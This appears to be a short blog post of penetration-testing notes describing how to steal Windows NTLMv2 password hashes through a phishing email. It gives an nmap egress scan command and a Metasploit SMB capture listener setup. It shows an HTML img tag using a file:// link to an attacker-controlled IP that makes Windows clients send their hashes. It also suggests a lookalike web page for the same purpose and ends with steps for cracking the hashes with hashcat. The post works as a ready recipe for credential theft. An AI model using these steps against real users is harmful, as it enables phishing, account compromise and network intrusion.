Not a new thing, just like most other posts, this is documentation.
If internal network access, scan with nmap for egress access, especially for port 445 and 139:
nmap -T4 -p0-65535 –max-retries 1 -sS -oA sweep_egress egadz.metasploit.com
If it’s closed, this probably isn’t going to work. If there is no access to test that, we’re flying blind and just hoping here.
Set up a listener on metasploit, I like auxiliary/server/capture/smb because it’s just so easy. Nothing to configure. Just “use” it and run.
Next, create an email for the target. In the email, include an html image tag and use file:// for the scheme. Point it to the metasploit server, and reference some non-existent image. Example: <img src=”file://192.168.1.10/image.jpg” /> This will create a broken image icon in the email, but when the user attempts to load from a Windows machine, the user’s NTLMv2 hash will be sent to the listener.
If you want to also craft a believable phishing email, you could also put a link to a web page that you control and on that web page, also include the same image tag. This is just in case the user’s mail client doesn’t allow downloading of images. But a browser will!
Once hash(es) are captured, shut down the listener and while still in metasploit, enter: creds
This will give the hashes in a format that a password cracker like hashcat will understand. For hashcat, use -m5600 for the NTLMv2 format. Also, ensure there is no extra whitespace around the hashes when loaded into hashcat, or there will be a string length exception.
Run the cracker and pray. If it cracks, congrats! If not in the time allotted, sorry!
824 total views